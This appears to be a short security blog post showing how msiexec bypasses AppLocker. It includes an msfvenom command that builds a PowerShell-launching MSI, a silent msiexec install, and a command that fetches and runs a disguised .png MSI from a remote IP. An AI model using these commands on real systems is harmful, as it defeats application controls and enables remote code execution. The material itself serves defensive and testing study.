AppLocker Bypass – MSIEXEC
MSIEXEC is a Microsoft utility that can be used to install or configure a product from the command line. If an environment is not configured properly the use of .MSI files can allow an attacker either to perform privilege escalation or to bypass AppLocker rules. The following post demonstrates that systems that are configured not to block execution of MSI files for all users are not properly protected as any AppLocker executable rule can be bypassed easily.
Metasploit MsfVenom can be used in order to generate .MSI files that will execute a command or a payload.
msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 199 bytes Final size of msi file: 159744 bytes
Execution of powershell.msi will open a PowerShell session bypassing the AppLocker rule that deny the use of PowerShell for all users.
It is also possible to run the command below either from a command prompt or if it is blocked through Windows Run.
msiexec /quiet /i cmd.msi
The command prompt will open.
Alternatively msiexec utility has the ability to run MSI files that have been renamed to PNG. These files can be executed either locally or remotely from a command prompt or from Windows Run bypassing AppLocker rules.
msiexec /q /i http://192.168.100.3/tmp/cmd.png
The same concept applies and for MSI files that contain Meterpreter payloads.